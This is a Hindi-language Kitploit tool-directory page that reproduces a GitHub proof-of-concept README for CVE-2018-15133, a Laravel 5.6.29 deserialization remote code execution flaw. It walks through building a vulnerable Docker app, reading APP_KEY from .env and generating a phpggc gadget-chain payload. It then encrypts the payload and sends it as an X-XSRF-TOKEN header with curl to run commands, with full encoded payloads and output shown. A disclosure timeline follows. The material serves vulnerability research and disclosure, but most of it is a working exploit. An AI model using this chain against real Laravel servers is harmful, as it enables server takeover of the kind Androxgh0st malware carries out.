Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
laravel-poc-CVE-2018-15133 — CVE-2018-15133 (Laravel unserialize भेद्यता) के लिए PoC | Kitploit
उपकरण/GitHubGitHub/kozmic/laravel-poc-cve-2018-15133
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubkozmic/laravel-poc-cve-2018-15133

laravel-poc-CVE-2018-15133

CVE-2018-15133 (Laravel unserialize भेद्यता) के लिए PoC

रिपॉजिटरी देखें
258362 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

APP_KEY लीक होने पर Laravel रिमोट कोड निष्पादन PoC (CVE-2018-15133)

इस रिपॉजिटरी में PHP 7.2.10 पर चलने वाला एक साधारण Laravel 5.6.29 एप्लिकेशन है, जिसमें routes/web.php में एक बुनियादी noop रूट जोड़ा गया है (देखें Dockerfile), और CVE-2018-15133 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट (cve-2018-15133.php) है, जो Laravel एप्लिकेशन का सफलतापूर्वक शोषण करके लक्ष्य सिस्टम पर uname -a निष्पादित करेगा।

एप्लिकेशन चलाने और लक्ष्य सिस्टम पर uname -a निष्पादित करने के निर्देश

root@kitploit:~
# Build the Docker image (or skip this step and fetch from kozmico/laravel-poc-cve-2018-15133):
docker build -t laravel-poc-cve-2018-15133 .
# Launch the container and expose it on localhost:8000:
docker run -d -p 8000:8000 laravel-poc-cve-2018-15133
# A vanilla Laravel 5.6.29 on PHP 7.2.10 should now be running on http://localhost:8000

Laravel 5.6.29 चला रहे डेमो-ऐप पर uname -a निष्पादित करने के लिए हम निम्नलिखित करते हैं:

  • चल रहे Laravel एप्लिकेशन से APP_KEY प्राप्त करें
  • एक unserialize पेलोड उत्पन्न करें जो system("uname -a"); निष्पादित करेगा
  • unserialize पेलोड को APP_KEY से एन्क्रिप्ट करें
  • एन्क्रिप्टेड पेलोड को POST अनुरोध हेडर में भेजें, और देखें कि कोड निष्पादित हो गया। सफलता!

उदाहरण शोषण जो uname -a निष्पादित करता है

root@kitploit:~
# Get APP_KEY:
$ docker exec -it $(docker ps --latest --quiet) grep -e \^APP_KEY /var/www/html/laravel/.env
APP_KEY=base64:9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk=

# Generate unserialize payload:
$ phpggc Laravel/RCE1 'uname -a' -b # Note: Vanilla phpggc will only work on PHP 5.6, this is a modified version
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

# Encrypt payload with APP_KEY:
$ ./cve-2018-15133.php 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

'PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic

HTTP header for POST request: 
X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9

# Send the exploit payload and see that 'uname  -a' executed since we can see 'Linux ad66c19a7ab5 4.15.0-33-generic #36-Ubuntu SMP Wed Aug 15 16:00:05 UTC 2018 x86_64 GNU/Linux' in the first line of the response:
$ curl localhost:8000 -X POST -H 'X-XSRF-TOKEN: eyJpdiI6Imp3c1BUejE5aGFFUVM4a0NcLzIyODBnPT0iLCJ2YWx1ZSI6InZrTEdOY2o1NlVJdlltWFl3OFBxTEY1a1pCZWlaSDRSdXM1STNSa21sSE5Cb3hFd09cL2JUdU0wWHhjK0dUU0dYQzlTd3ZYSm50NTc4NW90UnNrZW5mMHc2RHdcLzZia01cL29wVUhjQml5cCtmZ1VcL2lwbnVySG52MHEwWXdZMVFVSXhWYjFEQlwveTZPQ3JORnRYdVQyeVFnODM1UGVCSVFcL3B6RGs2VDczOTZEbkFKdFwvc3lpZXBtcUo4VllLNU4zS0pMV3ZBUlNXZDRHRmNnOG1vOFZUWDVicE5uV0FcL1NSXC9HRjh2XC9YR2pLUDlEdlEwaytWRHl5TFhvb3RXM0Y4ejNXIiwibWFjIjoiOTMwMTNkZDYwYzNjYmQ1YTg4ZjRmNjM2NmZhMzBjNzA5NTgzYmI0ZWM3Y2MzOGM4YmExYjM2ZTVkOTIzZDJjYyJ9'| head -n 2

Linux ad66c19a7ab5 4.15.0-33-generic #36-Ubuntu SMP Wed Aug 15 16:00:05 UTC 2018 x86_64 GNU/Linux
<!DOCTYPE html>
<html lang="en">

PHP 7.2 के लिए phpggc संशोधन: sed -i -e 's/assert/system/g' gadgetchains/Laravel/RCE/1/gadgets.php

समयरेखा

  • 2018-08-07: भेद्यता @kozmic द्वारा Laravel के सुरक्षा संपर्क को सूचित की गई और Mitre द्वारा CVE-2018-15133 निर्दिष्ट किया गया।
  • 2018-08-07: सुरक्षा संपर्क से 7 मिनट में पहली प्रतिक्रिया (प्रभावशाली!)
  • 2018-08-07: भेद्यता के बारे में स्पष्टीकरण और अधिक विवरण साझा किए गए।
  • 2018-08-08: Laravel 5.6.30 और Laravel 5.5.42 जारी किए गए जो भेद्यता को पैच करते हैं।
  • 2018-09-26: PoC को @kozmic द्वारा https://github.com/kozmic/laravel-poc-CVE-2018-15133/ पर प्रकाशित किया गया।
  • 2024-01-16: CVE-2018-15133 को CISA के Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा गया। CISA ने Known Indicators of Compromise Associated with Androxgh0st Malware नामक एक साइबरसुरक्षा सलाह प्रकाशित की, जो दस्तावेजित करती है कि Androxgh0st अपने मैलवेयर टूलकिट के हिस्से के रूप में CVE-2018-15133 का उपयोग करता है।
टूल डाउनलोड करें